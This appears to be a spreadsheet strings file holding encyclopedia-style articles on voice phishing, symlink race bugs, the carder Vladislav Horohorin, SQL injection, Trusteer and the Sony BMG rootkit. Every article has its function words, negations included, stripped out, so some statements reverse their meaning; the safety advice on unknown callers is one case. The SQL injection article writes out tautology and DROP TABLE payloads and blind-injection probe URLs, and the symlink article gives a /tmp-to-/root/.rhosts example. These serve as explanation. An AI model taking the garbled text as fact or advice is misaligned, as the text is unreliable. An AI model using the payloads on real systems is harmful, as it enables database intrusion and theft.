    <t>voice phishing, vishing, telephony (often voice telephony) conduct phishing attacks. landline telephone services traditionally trustworthy; terminated physical locations known telephone company, associated bill-payer. however, vishing fraudsters often modern voice (voip) features caller spoofing automated systems (ivr) impede detection enforcement agencies. voice phishing typically used steal credit card numbers information used identity theft schemes individuals. usually, voice phishing attacks conducted using automated text-to-speech systems direct victim call number controlled attacker, however live callers. posing employee legitimate body bank, police, telephone internet provider, fraudster attempts obtain personal details financial information regarding credit card, bank accounts (e.g. pin), well personal information victim. with received information, fraudster might able access empty account commit identity fraud. some fraudsters also persuade victim transfer money another bank account withdraw cash given directly. callers also often pose enforcement internal revenue service employee. scammers often target immigrants elderly, coerced wire hundreds thousands dollars response threats arrest deportation.bank account data sensitive information targeted. fraudsters sometimes also obtain security credentials consumers microsoft apple products spoofing caller microsoft apple inc. audio deepfakes used commit fraud, fooling people thinking receiving instructions trusted individual. terminology social engineering usage psychological manipulation, opposed conventional hacking methods, gain access confidential information. caller spoofing method callers able modify caller name number displayed call recipient different caller. phishers often modify numbers appear familiar trustworthy call recipient. common methods include spoofing number call recipient's area code spoofing government number call appears trustworthy familiar potential victim likely answer call. voice internet protocol (voip) also known telephony, voip technology allows voice calls made internet. voip frequently used vishing attacks allows callers spoof caller motives common motives include financial reward, anonymity, fame. confidential banking information utilized access victims’ assets. individual credentials sold individuals would like hide identity conduct certain activities, acquiring weapons. this anonymity perilous difficult track enforcement. another rationale phishers seek fame among cyber attack community. operation voice phishing comes various forms. there various methods various operation structures different types phishing. usually, scammers employ social engineering convince victims role playing create sense urgency leverage victims. voice phishing unique attributes separate attack method similar alternatives email phishing. with increased reach mobile phones, vishing allows targeting individuals without working knowledge email possess phone, elderly. historical prevalence call centers personal confidential information additionally allows easier extraction sensitive information victims trust many users speaking someone phone. through voice communication, vishing attacks personable therefore impactful similar alternatives email. faster response time attack attempt increased accessibility phone another unique aspect, comparison email victim take longer time respond. phone number difficult block scammers often simply change phone numbers specific number blocked often find ways around rules regulations. phone companies governments constantly seeking ways curb false scam calls. initiation mechanisms voice phishing attack initiated different delivery mechanisms. scammer directly call victim pretend trustworthy person spoofing caller appearing phone official someone nearby. scammers also deliver pre-recorded, threatening messages victims’ voicemail inboxes coerce victims taking action. victims also receive text message requests call specified number charged calling specific number. additionally, victim receive email impersonating bank; victim coerced providing private information, pin, account number, authentication credentials phone call. common methods scams voice phishing attackers often employ social engineering convince victims give money and/or access personal data. generally, scammers attempt create sense urgency and/or fear authority leverage victims. imposter scammers pose important person agency relative victim victim's relationship important person agency leverage scam money. scam: scammer poses official immigration officer. scammer threatens deportation arrest victim debts, even victim actually debt. romance scam: scammer poses potential love interest dating apps simply phone calls reconnect victim lover past needs emergency money reason, travel debts. social engineering used convince victims scammer love interest. extreme cases, scammer might meet victim take photos sexual activities leverage victim. tech support scam: scammer poses tech support claims urgent virus, severe technical issue victim's computer. scammer sense urgency obtain remote control victim's computer victim download special software diagnose supposed problem. once scammer gains remote control computer, access files personal information stored computer install malware. another possibility scammer victim payment resolve supposed technical issue. debt relief credit repair scams scammer poses company claims ability relieve debt repair credit. scammer requests company service. usually, performing action actually reduce credit score. business investment scams scammers pose financial experts convince victims offer money investments. charity scams scammers pose charity members convince victim donate cause. these fake organizations actually charity work instead, money donated goes directly scammers. auto warranty scams scammers make fake calls regarding victim's warranty offer option renew warranty. caller information victim's car, making offer appear legitimate. callers auto warranty scams gather personal information victims, collect money victims decide purchase proposed warranty. parcel scams targeting immigration populations, scammers claim victim parcel needs picked scammer initially poses courier company. nonexistent parcel connected financial criminal case. scammer, posing delivery company, transfers victim another scammer posing police foreign country. scammer posing police claim victim suspected needs investigated fake money laundering investigation. this done convincing victim identity stolen. scammer convinces victim send money “police” conduct investigation money bank. throughout process scammer take extra steps claim scammers reiterating police personal credentials bank account information. kidnapping scams scammers call claim kidnapped close relative loved one. this done either research beforehand using social engineering tactics assumptions glean information relative victim. example, since elderly vulnerable scams compared average population, scammers assume elderly probably children grandchildren. scammer threaten harm relative victim hangs certain cases scammer even victims talk “abducted relative'' fear, confusion, effect phone person's voice, victim fail notice fake abducted relative actually relative. detection prevention voice phishing attacks difficult victims identify legitimate institutions banks sometimes sensitive personal information phone. phishing schemes employ pre-recorded messages notable, regional banks make indistinguishable legitimate calls. additionally, victims, particularly elderly, forget know scammers’ ability modify caller making vulnerable voice phishing attacks.the federal trade commission (ftc) suggests several ways average consumer detect phone scams. warns making payments using cash, gift cards, prepaid cards, asserts government agencies call citizens discuss personal information social security numbers. additionally, potential victims attention characteristics phone call, tone accent caller urgency phone call determine whether call legitimate. primary strategy recommended avoid falling victim voice phishing answer calls unknown numbers. however, scammer utilizes voip spoof caller circumstances victims answer calls, strategies include pressing buttons prompted, answering questions asked suspicious caller.on march 2020, effort reduce vishing attacks utilize caller spoofing, federal communications commission adopted mandates known stir/shaken, framework intended used phone companies authenticate caller information. u.s. phone service providers june 2021, comply order integrate stir/shaken infrastructure lessen impact caller spoofing.in countries, social media used call communicate public. certain social media platforms, government bank profiles verified unverified government bank profiles would fake profiles. solutions direct effective mitigation strategy training general public understand common traits voice phishing attack detect phishing messages. technical approach would software detection methods. generally, mechanisms able differentiate phishing calls honest messages cheaply implemented public training. detection phishing straightforward method phishing detection usage blacklists. recent research attempted make accurate distinctions legitimate calls phishing attacks using artificial intelligence data analysis. analyzing converting phone calls texts, artificial intelligence mechanisms natural language processing used identify phone call phishing attack. offensive approaches specialized systems, phone apps, submit fake data phishing calls. additionally, various enforcement agencies continually making efforts discourage scammers conducting phishing calls imposing harsher penalties upon attackers. notable examples phone scam between 2012 2016, voice phishing scam ring posed internal revenue service immigration employees 50,000 individuals, stealing hundreds millions dollars well victims’ personal information. alleged co-conspirators united states india threatened vulnerable respondents “arrest, imprisonment, fines, deportation.” 2018, twenty-four defendants sentenced, longest term imprisonment twenty years. covid-19 scams march 2021, federal communications commission issued statement warning americans rising number phone scams regarding fraudulent covid-19 products. voice phishing schemes attempting sell products putatively “prevent, treat, mitigate, diagnose cure” covid-19 monitored food drug administration well. hollywood queen scam beginning 2015, phishing scammer impersonated hollywood make-up artists powerful female executives order coerce victims travel indonesia sums money premise they'll reimbursed. using social engineering, scammer researched lives victims extensively order mine details order make impersonation believable. scammer called victims directly, often multiple times hours time, order pressure victims. thamar reservoir cyberattack 2015 cyber attack campaign israeli academic thamar eilam gindin illustrates vishing attack precursor escalating future attacks information coerced victim. after iran-expert academic mentioned connections within iran israeli army radio, thamar received phone call request interview professor persian bbc. view questions ahead proposed interview, thamar instructed access google drive document requested password access. entering password access malicious document, attacker credentials elevated attacks. mobile bank scam sweden, mobile bank phone (launched 2011) used identify user internet banking. user logs bank computer, bank activates phone app, user enters password phone logged scam, malicious actors called people, claimed bank officer, claimed security problem asked victim mobile bank app. fraudsters able victim's account without victim ever giving away password. fraudster able transfer money victim's account. victim customer swedish bank nordea, scammers also able victim's account directly phone. 2018, changed require users photograph code computer screen. this ensures phone computer physically located room, mostly eliminated type fraud. also phone fraud smishing voice cloning voip spam references external links https://www.bbc.co.uk/news/business-34425717 legal career "hit vishing scam" https://www.bbc.co.uk/news/business-34153962 caught tape: phone scammers tricked victim £12,000 lynam carter news vnunet.com story: cyber-criminals switch voip "vishing" news story: criminals exploit phone calls paper messaging security 2006: vishing: next cyber headache? register: warns "alarming" rise american "vishing" vice media: hacker take over your life hijacking your phone number assessment call centre staff handle vishing call.</t>
  </si>
  <si>
    <t>Symlink race</t>
  </si>
  <si>
    <t>symlink race kind software security vulnerability results program creating files insecure manner. malicious user create symbolic link file otherwise accessible them. when privileged program creates file name symbolic link, actually creates linked-to file instead, possibly inserting content desired malicious user (see example below), even provided malicious user input program). called "race" typical manifestation, program checks file name already exists; exist, program creates file. attacker must create link interval check file created. symlink race happen antivirus products decide quarantine delete suspicious file, ahead that. during interval decision action, malicious software replace suspicious file system antivirus file malicious software wants overwritten. example naive example, unix program setuid. function retrieve information accounts specified user. "efficiency", sorts requested accounts temporary file (/tmp/foo naturally) making queries. directory /tmp world-writable. malicious user mallory creates symbolic link file /root/.rhosts named /tmp/foo. then, mallory invokes user requested account. program creates (temporary) file /tmp/foo (really creating /root/.rhosts) puts information requested account (e.g. user password) removes temporary file (merely removing symbolic link). /root/.rhosts contains password information, even happens proper format) incantation necessary allow anyone rlogin computer superuser. also unix-systems special flag o_nofollow open(2) prevent opening file symbolic-link (dangling otherwise). it's become standardized posix.1-2008. workaround posix standard library function mkstemp used safely create temporary files. shell scripts, system utility mktemp(1) thing. references</t>
  </si>
  <si>
    <t>Vladislav Horohorin</t>
  </si>
  <si>
    <t>vladislav anatolievich horohorin, (russian: владислав анатольевич хорохорин), alias badb, former hacker international credit card trafficker convicted wire fraud served seven-year prison sentence. early life horohorin born september 1982, grew donetsk, ukraine, emigrating 1999 israel mother, served israeli defence forces. investigation according undercover investigation united states secret service, horohorin founders carderplanet, several websites taken 2004, part secret service's operation firewall investigation. sites operated cyber criminal organizations traffic counterfeit credit cards, false identification information documents. these websites shared information commit fraud, also provided forum purchase fraud-related information tools. "the network created founders carderplanet, including vladislav horohorin, remains sophisticated organizations online financial criminals world," said michael merritt, assistant director investigations. "this network repeatedly linked nearly every major intrusion financial information reported international enforcement community. this arrest illustrates significance secret service's commitment traversing globe pursuit online criminals."horohorin promoted illegal activities creating video cartoons ridiculing american card holders.separately, 2013, horohorin named co-conspirator indictment, subsequently charged, criminal case district jersey 09-626 (jbs), russian individuals charged successfully hacking nasdaq, 7-eleven, carefour, jcpenney, heartland payment systems, jones, jetblue corporations. this breach called "largest known data breach conspiracy ever prosecuted" u.s. justice department. april 2017, none horohorin's co-conspirators sentenced. arrest, extradition, guilty plea, sentencing horohorin identified "badb" november 2009 sealed indictment united states attorney's office. arrested august 2010, nice, france, attempting board plane warsaw, poland. however, complexity international legal battle followed arrest, extradited united states june 2012. during proceedings france, horohorin incarcerated maison d'arret d'aix-luynes near aix-en-provence, france. horohorin arraigned june 2012, detained pending trial.the criminal division's office international affairs handled horohorin's extradition france. february 2017, horohorin released deported united states.horohorin works private consultant security auditor cybersec.org. references external links https://www.wired.com/images_blogs/threatlevel/2010/08/badb-indictment-in-dc.pdf https://lawfare.s3-us-west-2.amazonaws.com/staging/2017/groupindict2nd.pdf second worldpay indictment</t>
  </si>
  <si>
    <t>SQL injection</t>
  </si>
  <si>
    <t>injection code injection technique used attack data-driven applications, malicious statements inserted entry field execution (e.g. dump database contents attacker). injection must exploit security vulnerability application's software, example, user input either incorrectly filtered string literal escape characters embedded statements user input strongly typed unexpectedly executed. injection mostly known attack vector websites used attack type database. injection attacks allow attackers spoof identity, tamper existing data, cause repudiation issues voiding transactions changing balances, allow complete disclosure data system, destroy data make otherwise unavailable, become administrators database server. 2012 study, observed average application received four attack campaigns month, retailers received twice many attacks industries. history first public discussions injection started appearing around 1998; example, 1998 article phrack magazine. form injection (sqli) considered application vulnerabilities 2007 2010 open application security project. 2013, sqli rated number attack owasp ten. there four main sub-classes injection: classic sqli blind inference injection database management system-specific sqli compounded sqlisql injection insufficient authentication injection ddos attacks injection hijacking injection xssthe storm worm representation compounded sqli.this classification represents state sqli, respecting evolution 2010—further refinement underway. technical implementations incorrectly constructed statements this form injection relies fact statements consist data used statement commands control statement executed. example, statement select person name 'susan' string 'susan' data fragment example command (the value also data example). injection occurs specially crafted user input processed receiving program allows input exit data context enter command context. this allows attacker alter structure statement executed. simple example, imagine data 'susan' statement provided user input. user entered string 'susan' (without apostrophes) form text entry field, program used string concatenation statements form statement three fragments select person name=', user input 'susan', imagine instead entering 'susan' attacker entered 1=1; program string concatenation approach fragments select person name=', user input 1=1; construct statement select person name='' 1=1; many databases ignore text '--' string denotes comment. structure command select person name='' 1=1; select person rows rather named 'susan' whose attacker managed craft data string exits data context entered command context. complex example presented. imagine program creates statement using following string assignment command statement "select from users where name username "'"; this code designed pull records specified username table users. however, "username" variable crafted specific malicious user, statement code author intended. example, setting "username" variable '1'='1 using comments even block rest query (there three types comments). three lines space end: '1'='1' '1'='1' '1'='1' renders following statements parent language: code used authentication procedure example could used force selection every data field users rather specific user name coder intended, evaluation '1'='1' always true. following value "username" statement would cause deletion "users" table well selection data "userinfo" table essence revealing information every user), using allows multiple statements: a';drop table users; select from userinfo where this input renders final statement follows specified: while server implementations allow multiple statements executed call way, apis php's mysql_query() function allow security reasons. this prevents attackers injecting entirely separate queries, stop modifying queries. blind injection blind injection used application vulnerable injection results injection visible attacker. page vulnerability displays data display differently depending results logical statement injected legitimate statement called page. this type attack traditionally considered time-intensive statement needed crafted recovered, depending structure, attack consist many unsuccessful requests. recent advancements allowed request recover multiple bits, unsuccessful requests, allowing consistent efficient extraction. there several tools automate attacks location vulnerability target information established. conditional responses type blind injection forces database evaluate logical statement ordinary application screen. example, book review website uses query string determine book review display. https://books.example.com/review?id=5 would cause server query would populate review page data review stored table bookreviews. query happens completely server; user know names database, table, fields, user know query string. user sees returns book review. hacker load urls https://books.example.com/review?id=5 https://books.example.com/review?id=5 1=2, result queries respectively. original review loads "1=1" blank error page returned "1=2" url, returned page created alert user input invalid, words, caught input test script, site likely vulnerable injection attack query likely passed successfully cases. hacker proceed query string designed reveal version number mysql running server: https://books.example.com/review?id=5 substring(@@version, instr(@@version, '.') 1)=4, would show book review server running mysql blank error page otherwise. hacker continue code within query strings achieve goal directly, glean information server hopes discovering another avenue attack. second order injection second order injection occurs submitted values contain malicious commands stored rather executed immediately. cases, application correctly encode statement store valid sql. then, another part application without controls protect injection might execute stored statement. this attack requires knowledge submitted values later used. automated application security scanners would easily detect type injection need manually instructed check evidence attempted. mitigation injection well known attack easily prevented simple measures. after apparent injection attack talktalk 2015, reported security experts stunned large company would vulnerable object relational mappers developers frameworks hibernate create database queries safe developer-friendly way. since database queries longer constructed strings, danger injection vulnerability. application firewalls while products modsecurity cannot prevent injection vulnerabilities creeping codebase, make discovery exploitation significantly challenging attacker. parameterized statements with development platforms, parameterized statements work parameters used (sometimes called placeholders bind variables) instead embedding user input statement. placeholder store value given type arbitrary fragment. hence injection would simply treated strange (and probably invalid) parameter value. many cases, statement fixed, parameter scalar, table. user input assigned (bound) parameter.easily put, using parameterized queries definitely prevent injection. this mainly means variables query strings would accept arbitrary inputs, however, parameters given types definitely necessary. parameterized queries require developer define code. therefore, without parameterized queries, anyone could kind code field, database erased. parameters '@username' person would able username without kind code. enforcement coding level using object-relational mapping libraries avoids need write code. library effect generate parameterized statements object-oriented code. escaping popular, though error-prone ultimately doomed prevent injections attempt escape characters special meaning sql. manual dbms explains characters special meaning, allows creating comprehensive blacklist characters need translation. instance, every occurrence single quote parameter must replaced single quotes ('') form valid string literal. example, usual escape parameters using function mysqli_real_escape_string(); sending query: this function prepends backslashes following characters: \x00, \x1a. this function normally used make data safe sending query mysql. similar functions database systems pg_escape_string() postgresql. function addslashes(string $str) works escaping characters, used especially querying databases escaping functions php. returns string backslashes characters need escaped database queries, etc. these characters single quote ('), double quote ("), backslash (the null byte). routinely passing escaped strings error prone easy forget escape given string. creating transparent layer secure input reduce susceptibility error, entirely eliminate pattern check integer, float boolean, string parameters checked value valid representation given type. strings must follow strict pattern (date, uuid, alphanumeric only, etc.) checked match pattern. database permissions limiting permissions database login used application needed help reduce effectiveness injection attacks exploit bugs application. example, microsoft server, database logon could restricted selecting system tables would limit exploits insert javascript text columns database. examples february 2002, jeremiah jacks discovered guess.com vulnerable injection attack, permitting anyone able construct properly-crafted pull 200,000+ names, credit card numbers expiration dates site's customer database. november 2005, teenaged hacker used injection break site taiwanese information security magazine tech target group steal customers' information. january 2006, russian computer criminals broke rhode island government website allegedly stole credit card data individuals done business online state agencies. march 2006, hacker discovered injection flaw official indian government's tourism site. june 2007, computer criminal defaced microsoft website using injection. website register quoted microsoft spokesperson acknowledging problem. september 2007 january 2009 turkish hacker group "m0sted" used injection exploit microsoft's server hack servers belonging mcalester army ammunition plant army corps engineers respectively. january 2008, tens thousands infected automated injection attack exploited vulnerability application code uses microsoft server database store. july 2008, kaspersky's malaysian site hacked "m0sted" hacker group using injection. april 2008, sexual violent offender registry oklahoma shut website "routine maintenance" informed 10,597 social security numbers belonging offenders downloaded injection attack 2008, server farm inside china used automated queries google's search engine identify server websites vulnerable attack automated injection tool. 2008, least april august, sweep attacks began exploiting injection vulnerabilities microsoft's server server database server. attack require guessing name table column, corrupts text columns tables single request. html string references malware javascript file appended value. when database value later displayed website visitor, script attempts several approaches gaining control visitor's system. number exploited pages estimated 500,000. august 2009, united states department justice charged american citizen, albert gonzalez, unnamed russians theft million credit card numbers using injection attack. reportedly "the biggest case identity theft american history", stole cards number corporate victims researching payment processing systems. among companies credit card processor heartland payment systems, convenience store chain 7-eleven, supermarket chain hannaford brothers. december 2009, attacker breached rockyou plaintext database containing unencrypted usernames passwords million users using injection attack. july 2010, south american security researcher goes handle russo" obtained sensitive user information popular bittorrent site pirate bay. gained access site's administrative control panel exploited injection vulnerability enabled collect user account information, including addresses, password hashes records torrents individual users uploaded. from july 2010, attackers japan china used injection gain access customers' credit card data beat, osaka-based company runs large online supermarket site. attack also affected seven business partners including supermarket chains izumiya maruetsu inc, ryukyu jusco theft data affected reported 12,191 customers. august 2010 reported cases credit card information used third parties purchase goods services china. september 2010 swedish general election voter attempted code injection hand writing commands part write-in vote. november 2010 british royal navy website compromised romanian hacker named tinkode using injection. february 2011 hbgary, technology security firm, broken lulzsec using injection cms-driven website march 2011, www.mysql.com, official homepage mysql, compromised hacker using blind injection april 2011, barracuda networks compromised using injection flaw. email addresses usernames employees among information obtained. over period hours april 2011, automated injection attack occurred broadband reports website able extract username/password pairs: 8,000 random accounts 9,000 active 90,000 inactive accounts. june 2011, "hacktivists" group lulzsec accused using sqli steal coupons, download keys, passwords stored plaintext sony's website, accessing personal information million users. june 2011, hacked lulzsec, likely injection; full process used hackers execute injections described imperva blog. 2012, website wurm online, massively multiplayer online game, shut injection site updated. july 2012 hacker group reported stolen 450,000 login credentials yahoo!. logins stored plain text allegedly taken yahoo subdomain, yahoo! voices. group breached yahoo's security using "union-based injection technique". october 2012, hacker group called "team ghostshell" published personal records students, faculty, employees, alumni universities including harvard, princeton, stanford, cornell, johns hopkins, university zurich pastebin.com. hackers claimed trying "raise awareness towards changes made today's education", bemoaning changing education laws europe increases tuition united states. february 2013, group maldivian hackers, hacked website "un-maldives" using injection. june 2013, hacker group "redhack" breached istanbul administration site. they claimed that, they've able erase people's debts water, gas, internet, electricity, telephone companies. additionally, published admin user name password citizens clear debts early morning. they announced news twitter. november 2013, hacktivist group "raptorswag" allegedly compromised chinese government databases using injection attack chinese chamber international commerce. leaked data posted publicly cooperation anonymous. february 2014, 40,000 accounts leaked hacking group called @deletesec february 2014, united nations internet governance forum 3,215 account details leaked. february 2014, hackers group called @deletesec hacked spirol international allegedly threatening hackers arrested reporting security vulnerability. 70,000 user details exposed conflict. march 2014, officials johns hopkins university publicly announced biomedical engineering servers become victim injection attack carried anonymous hacker named "hooky" aligned hacktivist group "raptorswag". hackers compromised personal details students staff, posting press release leaked data internet. august 2014, milwaukee-based computer security company hold security disclosed uncovered theft confidential information nearly 420,000 websites injections. york times confirmed finding hiring security expert check claim. october 2015, injection attack used steal personal details 156,959 customers british telecommunications company talktalk's servers, exploiting vulnerability legacy portal. august 2020, injection attack used access information romantic interests many stanford students, result insecure data sanitization standards part link, start-up founded campus undergraduate ishan gandhi. early 2021, gigabytes data exfiltrated far-right website injection attack. vulnerability introduced codebase fosco marotto, gab's cto. second attack launched next week using oauth2 tokens stolen first attack. popular culture 2007 xkcd cartoon involved character robert'); drop table students;-- named carry injection. result cartoon, injection sometimes informally referred "bobby tables". unauthorized login websites means injection forms basis subplots j.k. rowling's 2012 novel casual vacancy. 2014, individual poland legally renamed business dariusz jakubowski drop table users; select attempt disrupt operation spammers' harvesting bots. 2015 game hacknet hacking program called sql_memcorrupt. described injecting table entry causes corruption error database, queries said table, causing database crash core dump. 2019 star trek: discovery episode memory serves commander airiam discovered probe attacked data store ship's shuttlecraft made number injections, find compromised files. also code injection cross-site scripting metasploit project owasp open application security project sgml entity uncontrolled format string w3af application security references external links injection knowledge base, websec. wasc threat classification injection entry, application security consortium. injection won't away archived november 2012, wayback machine, stuart thomas. quick security references injection bala neerumalla. security flaws work: injection</t>
  </si>
  <si>
    <t>Trusteer</t>
  </si>
  <si>
    <t>trusteer boston-based computer security division ibm, responsible suite security software. founded mickey boodaei rakesh loonkar, israel 2006, trusteer acquired september 2013 billion.trusteer's products block online threats malware phishing attacks, support regulatory compliance requirements. trusteer's malware research team aims analyze information received installed base 30,000,000 user endpoints hundreds organizations.trusteer presence north america, south america, europe, africa, japan china. products trusteer's products prevent incidents point attack investigating source mitigate future attacks. addition, trusteer allows organizations receive immediate alerts, report whenever threat launched customers. trusteer rapport trusteer rapport security software advertised additional layer security anti-virus software. designed protect confidential data, account credentials, stolen malicious software (malware) phishing. achieve goal, software includes anti-phishing measures protect misdirection attempts prevent malicious screen scraping; attempts protect users following forms attacks: man-in-the-browser, man-in-the-middle, session hijacking screen capturing.on installation, rapport also tries remove existing financial malware end-user machines prevent future infection.the client available multiple platforms form browser extension. march 2020, windows version supports google chrome, microsoft edge, mozilla firefox, microsoft internet explorer windows later; macos version supports google chrome, mozilla firefox, apple safari macos 10.12 (sierra) later.financial institutions offer software free charge view making online banking safer customers. banks offering software include bank america, société générale, tangerine, ingdirect, hsbc, cibc, bmo, guaranty trust bank (gtbank), ecobank davivienda first republic bank.some banks offered software discontinued offering instance, natwest withdrew january 2019, stating "the security fraud prevention technologies provide higher broader level protection." trusteer pinpoint trusteer pinpoint web-based service allows financial institutions detect mitigate malware, phishing account takeover attacks without installing software endpoint devices. allows companies concerned online fraud data theft scan traffic ensure outside laptop desktop brought corporate network infected malware allowing visitor access services.trusteer pinpoint combines device fingerprinting, proxy detection malware infection detection. when user infected malware accesses online banking site protected trusteer pinpoint malware detection, identifies infection malware type (e.g. “user steve infected prinimalka-gozi”), alerts bank flags user's credentials compromised. once notified, banks immediately contact user install trusteer rapport remove malware. trusteer pinpoint account takeover detection also fingerprints device checks proxies. trusteer mobile fraud risk prevention mobile risk engine aims protect organizations mobile pc-to-mobile (cross-channel) attacks. product tries detect stops account takeover mobile devices identifying criminal access attempts. also tries identify devices vulnerable compromise malware infected. trusteer mobile risk engine web-based service includes trusteer mobile sdk, trusteer mobile app, trusteer mobile out-of-band authentication, mobile risk api. combination mobile risk engine client-side components provide device fingerprinting mobile devices, account takeover prevention mobile devices, detection compromised mobile devices, access global fraudster database. trusteer apex trusteer apex automated solution tries prevent exploits malware compromising endpoints extracting information. apex three layers security: exploit prevention, data exfiltration prevention credentials protection. apex protects employee credentials phishing attacks validating employees submitting credentials authorized enterprise web-application login urls. apex also prevents corporate employees re-using corporate credentials access non-corporate, public applications like paypal, e-bay, facebook twitter. apex requires users provide different credentials applications, lower risk credentials exposure.trusteer apex targeted behaviors small group applications, hypothesis responsible overwhelming majority exploits, namely java, adobe's reader flash, microsoft's office. technology behind trusteer apex rely threat signatures, so-called "whitelists" good applications. instead, watches applications spots suspicious malicious behavior, based knowledge "normal" application behavior refined large user base. trusteer claims apex block based attacks used implant malware exploiting vulnerable applications, data loss malware infections spotting attempts untrusted applications processes send data outside organization connect internet-based command control (c&amp;c) networks. technical concerns users reported problems rapport, slow high utilization, incompatibility various security/antivirus products difficulty removing software.the consumer organisation which? found many members problems running trusteer rapport, advised using they found could conflict security software, slow crash browser. which? emphasises bank's responsibility, rapport's, protect customers' online banking, adding online banking perfectly safe without trusteer rapport; benefit would detecting phishing site masquerading bank—"but plenty tools, including modern browsers, anyway". they clarify software legitimate respectable, "don't feel claims rapport's website up".in presentation given 44con september 2011, bypassing trusteer rapport's keylogger protection shown relatively trivial. shortly thereafter trusteer confirmed flaw corrected said even hacker able flaw disable anti-keylogging functions rapport, secondary security protection technologies would still play.rapport software incompatible windows tool driver verifier cause blue screen system crash. since driver verifier intended users production environment workstations, trusteer support recommends users driver verifier trusteer endpoint protection installed. blue lawsuit march 2011, blue gem, rival company, filed lawsuit trusteer california court. blue accused trusteer plagiarizing code order maintain compatibility anti-keystroke logging software types intel chipset first introduced back 2007. trusteer described accusations "baseless". also trustee (disambiguation) references external links official website frost sullivan report reuters article article</t>
  </si>
  <si>
    <t>Sony BMG copy protection rootkit scandal</t>
  </si>
  <si>
    <t>scandal erupted 2005 regarding sony bmg's implementation copy protection measures million cds. when inserted computer, installed pieces software provided form digital rights management (drm) modifying operating system interfere copying. neither program could easily uninstalled, created vulnerabilities exploited unrelated malware. programs would install "phone home" reports user's private listening habits, even user refused end-user license agreement (eula), mentioned eula all. both programs contained code several pieces copylefted free software apparent infringement copyright, configured operating system hide software's existence, leading programs classified rootkits. sony initially denied rootkits harmful. released uninstaller programs merely made program's files visible also installing additional software could easily removed, collected email address user introduced security vulnerabilities. following public outcry, government investigations class-action lawsuits 2005 2006, sony partially addressed scandal consumer settlements, recall affected suspension copy-protection efforts early 2007. background august 2000, statements sony pictures entertainment u.s. senior vice president steve heckler foreshadowed events late 2005. heckler told attendees americas conference information systems: "the industry take whatever steps needs protect protect revenue streams lose revenue stream, matter sony going take aggressive steps stop this. develop technology transcends individual user. firewall napster source block cable company. block phone company. block isp. firewall these strategies aggressively pursued simply much stake."in europe, created minor scandal 2001 released natalie imbruglia's second album white lilies island without warning labels stating contained copy protection. eventually replaced. sony released copy-protected versions certain releases certain markets late 2001, late 2002 report indicated sold europe would contain form copy protection. copy-protection software pieces copy-protection software issue 2005–2007 scandal included million marketed sony bmg, record company formed 2004 merger sony bmg's recorded music divisions. about million cds, spanning titles, contained first internet (f4i)'s extended copy protection (xcp), installed microsoft windows systems user accepted eula, made mention software. remaining million cds, spanning titles, contained sunncomm's mediamax cd-3, installed either microsoft windows systems user presented eula, regardless whether user accepted however, prompted user confirmation software attempted modify whereas windows not. rootkit scandal erupted october 2005 winternals (later acquired microsoft corporation) researcher mark russinovich posted blog detailed description technical analysis f4i's software determined recently installed computer sony music russinovich compared software rootkit surreptitious installation efforts hide existence. noted eula mention software, charged software illegitimate digital rights management "gone far."anti-virus firm f-secure concurred: "although software directly malicious, used rootkit hiding techniques exactly used malicious software hide. software cause many similar false alarms software detect rootkits. thus inappropriate commercial software techniques." after public pressure, symantec anti-virus vendors included detection rootkit products well, microsoft announced would include detection removal capabilities security patches.russinovich discovered numerous problems xcp: creates security holes exploited malicious software worms viruses. constantly runs background excessively consumes system resources, slowing user's computer, regardless whether protected playing. employs unsafe procedures start stop, could lead system crashes. uninstaller, installed inexpert attempts uninstall cause operating system fail recognize existing drives.soon russinovich's first post, several trojans worms exploiting xcp's security holes appeared. some even used vulnerabilities cheat online games.sony quickly released software remove rootkit component affected microsoft windows computers, russinovich analyzed utility, reported blog exacerbated security problems raised concerns privacy. russinovich noted removal program merely unmasked hidden files installed rootkit actually remove rootkit. also reported installed additional software could uninstalled. order download uninstaller, found necessary provide e-mail address (which sony privacy policy implied added various bulk e-mail lists) install activex control containing backdoor methods (marked "safe scripting" thus prone exploits). microsoft later issued killbit activex control. november 2005, sony provided "new improved" removal tool remove rootkit component affected microsoft windows computers. mediamax cd-3 legal financial problems product recall november 2005 vnunet.com announced sony backing copy-protection software, recalling unsold stores allowing consumers exchange affected versions without software. electronic frontier foundation compiled partial list xcp. sony maintained "there security risks associated anti-piracy technology" despite numerous virus malware reports. november 2005, us-cert, part united states department homeland security, issued advisory drm. said uses rootkit technology hide certain files user technique security threat users. they also said uninstallation options provided sony introduces vulnerabilities. us-cert advised: install software sources expect contain software, audio cd."sony announced instructed retailers remove unsold music discs containing software shelves. internet-security expert kaminsky estimated 500,000 networks.cds technology identified letters "xcp" printed back cover jewel case according sonybmg's faq.on november 2005, reuters reported sony would exchange affected unsecure unprotected discs well unprotected files. part swap program, consumers could mail xcp-protected sony receive unprotected disc return mail. november investigators york attorney general eliot spitzer found that, despite recall november sony still sale york city music retail outlets. spitzer said: unacceptable three weeks serious vulnerability revealed, still shelves, busiest shopping days year, [and] strongly urge retailers heed warnings issued products, pull distribution immediately, ship back sony."the next day, massachusetts attorney general reilly announced sony still available boston despite sony recall november advised consumers purchase sony said conducting investigation sony bmg. sony bmg's website offered consumers link "class action settlement information regarding mediamax content protection" online claim filing links software updates uninstallers. deadline submitting claim june 2007. website offered explanation events well list affected cds. texas state action november 2005, texas attorney general greg abbott sued sony bmg. suit first filed u.s. state also first filed state's 2005 spyware law. alleged company surreptitiously installed spyware millions cds. december 2005, abbott added allegations lawsuit, claiming mediamax violated state's spyware deceptive trade practices laws mediamax software would installed computer even user declined license agreement authorizing action. abbott stated: keep discovering additional methods sony used deceive texas consumers thought simply buying music", "thousands texans potential victims deceptive game sony played consumers purposes." addition violations consumer protection against computer spyware 2005, allowed civil penalties $100,000 violation law, alleged violations added updated lawsuit carried maximum penalties $20,000 violation. sony ordered $750,000 legal fees texas, accept customer returns affected cds, place conspicuous detailed notice homepage, make "keyword buys" alert consumers advertising google, yahoo! msn, $150 damaged computer agree remedies. sony also agree would bring claim legal settlement constitutes approval court. york california class-action suits class-action suits filed sony york california.on december 2005, york times reported sony reached tentative settlement lawsuits, proposing ways compensating consumers purchased affected cds. according proposed settlement, purchased would paid $7.50 purchased recording provided opportunity download either free album three additional albums limited list recordings elected forgo cash incentive. district judge naomi reice buchwald entered order tentatively approving settlement january 2006. settlement designed compensate whose computers infected otherwise damaged. those incurred damages addressed class-action suit free settlement pursue litigation. fairness hearing held 2006 york. claims required submitted december 2006. class members wished excluded settlement required filed 2006. those remained settlement could attend fairness hearing expense speak behalf represented attorney. other actions italy, alcei association similar eff) also reported rootkit financial police, asking investigation various computer crime allegations, along technical analysis rootkit.the u.s. department justice made comment whether would take criminal action sony. however, stewart baker 